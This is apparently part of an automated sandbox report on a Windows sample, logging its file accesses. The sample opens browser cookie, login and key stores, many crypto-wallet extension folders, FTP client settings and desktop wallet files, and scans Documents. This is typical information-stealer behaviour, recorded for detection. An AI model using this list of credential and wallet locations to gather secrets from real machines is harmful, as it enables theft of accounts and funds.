                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
